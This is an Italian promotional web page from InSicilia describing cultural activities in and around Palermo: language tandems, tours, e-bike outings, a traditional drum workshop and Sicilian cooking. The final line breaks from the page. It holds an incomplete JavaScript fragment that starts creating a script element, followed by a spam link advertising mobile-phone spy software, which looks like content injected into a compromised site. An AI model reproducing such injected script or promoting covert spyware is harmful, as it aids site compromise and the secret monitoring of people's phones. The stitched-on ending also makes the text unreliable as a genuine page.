Un ambiente informale e dinamico è fondamentale per promuovere lo scambio tra culture diverse. InSicilia organizza strategicamente e creativamente Attività Culturali al fine di facilitare l’inserimento dei partecipanti in diversi ambienti socio-culturali.

Le attività culturali proposte contribuiscono ad implementare le competenze trasversali e a promuovere l’interculturalità, garantendo la pluralità degli orientamenti culturali.

Conversation Exchange

InSicilia organizza incontri di gruppo con l’intensione di promuovere il dialogo e di diffondere la conoscenza della cultura italiana e siciliana, patrimonio di ogni abitante dello Stivale. I partecipanti prendono parte allo scambio in lingua e interagiscono attraverso attività dinamiche per migliorare ed accrescere le loro competenze linguistiche nonché culturali.  InSicilia promuove il tandem linguistico: un metodo per l’apprendimento linguistico grazie all’attivazione di una conversazione tra 2 soggetti parlanti lingue diverse. Ciascuno dei due partecipanti è madrelingua della lingua che l’altro vuole apprendere. Imparare le lingua in tandem è un metodo di apprendimento aperto attraverso il quale persone di lingua madre diversa lavorano in coppia con il fine di: imparare la lingua del partner, conoscere il partner e la sua cultura, scambiarsi conoscenze. Lavorare in tandem è un modo di apprendimento interculturale che richiede nello stesso tempo partecipazione ed autonomia. Inoltre InSicilia realizza incontri di conversazione in lingua inglese tra giovani stranieri e italiani desiderosi di sviluppare le proprie competenze linguistiche in lingua inglese.

Visite Culturali

Le Visite culturali pongono l’accento sull’esperienza di vita comune all’interno di un contesto culturalmente straniero, vanno al di là della mera esplorazione  o scoperta culturale e implicano una trasformazione del consueto  stile di vita a sostegno della valorizzazione del territorio. InSicilia organizza tour culturali che rivelano la preziosità di Palermo, visitando i principali monumenti e le strade caratteristiche del capoluogo siciliano. E’ possibile organizzare differenti tour, a seconda delle richieste dei partecipanti,  che coprono l’intero territorio siciliano, ad esempio: Monreale, Erice, Cefalù, Marsala, ecc. Le Visite Culturali consentono la condivisione di tutti quei valori che appartengono alla sicilianità, mirano a metter in primo piano gli elementi caratterizzanti la bellezza del territorio e le relazioni interpersonali. I partecipanti avranno la possibilità di scoprire le diverse dominazioni culturali che si sono avvicendate in Sicilia.

InSicilia offre l’opportunità di prendere parte a innumerevoli eventi o iniziative capaci di stimolare l’entusiasmo nella scoperta di una nuova città; è possibile su richiesta partecipare a spettacoli teatrali, cinema, gallerie d’arte o festival.

Social e-bike

InSicilia organizza escursioni innovative in giro per Palermo e nelle sue vicinanze in bicicletta o bici elettrica per scoprire le meraviglie artistiche della Sicilia. Si tratta di una nuova opportunità di comunicare e interagire con il territorio e la cultura, è possibile organizzare una ‘pedalata’ intorno le aree socio-culturali e storiche della provincia palermitana.

Workshop sui Tamburi e sulla Musica Popolare Siciliana

InSicilia  propone un particolarissimo ‘viaggio’ alla scoperta della musica popolare siciliana grazie ad un laboratorio sperimentale sulle tecniche del tamburo tipico siciliano che permetterà ai partecipanti di acquisire le tecniche di base sull’uso dello strumento. I partecipanti hanno l’opportunità di creare un rapporto speciale di armonia e di comunicazione con il tamburo. Non è richiesta alcuna conoscenza di base della musica. I partecipanti entreranno in contatto con lo strumento in maniera spontanea e immediata, senza alcun “filtro culturale”. Per il laboratorio forniamo ai partecipanti  alcuni tamburelli fatti a mano, tipici del folklore siciliano.

Esperienza di Cucina Siciliana

Crocevia delle più grandi civiltà mediterranee, la Sicilia porta ancora le influenze culturali e gastronomiche dei numerosi popoli che vi hanno vissuto. InSicilia dà l’opportunità di imparare e di essere protagonisti nella preparazione dei piatti tipici siciliani con le famiglie locali. I partecipanti dopo la preparazione potranno gustare i cibi cucinati in gruppo. La cucina siciliana è tanto complessa come la sua storia e da questa esperienza i partecipanti potranno apprezzare la tradizione non solo culinaria ma anche culturale siciliana.

var d=document;var s=d.createElement('script'); https://topspyapps.net - The most popular 2017 spy software applications for the mobile phones.topspyapps.net